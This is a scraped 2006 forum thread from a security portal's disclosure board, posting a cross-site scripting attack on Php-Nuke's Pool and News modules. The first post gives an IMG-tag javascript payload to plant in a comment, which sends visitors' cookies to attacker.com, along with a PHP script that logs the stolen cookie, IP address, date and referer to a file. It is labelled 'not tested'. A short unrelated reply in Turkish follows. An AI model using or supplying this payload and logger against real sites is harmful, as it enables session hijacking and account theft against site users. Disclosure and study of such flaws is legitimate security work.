|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 161
Members: 0
Total: 161
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Php-Nuke Pool and News Module IMG Tag Cross Site Scripting |
|
Posted: Mon Jan 09, 2006 1:09 am |
|
|
syntax9 |
Active user |
|
|
Joined: Dec 21, 2005 |
Posts: 33 |
|
|
|
|
|
|
|
/*SecurityReason - not tested */
##Night_Warrior Kurdihs Hacker
##night_warrior771[at]hotmail.com
##Php-Nuke Pool and News Module IMG Tag Cross Site Scripting
##Contact :night_warrior771[at]hotmail.com
Post Coment this Code:
<img src="javascript:window.navigate('http://attacker.com/cookies.php?c='+document.cook
ie);"
cookies.php
<?
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('steal.php', 'a');
fwrite($fp, '
Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.' ');
fclose($fp);
?> |
|
|
|
|
Posted: Thu Jan 26, 2006 11:11 pm |
|
|
oasis |
Beginner |
|
|
Joined: Nov 29, 2005 |
Posts: 2 |
|
|
|
|
|
|
|
vay k?rt vay,senin nickin pek de yabancı gelmiyo bana |
|
|
|
|
www.waraxe.us Forum Index -> PhpNuke
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|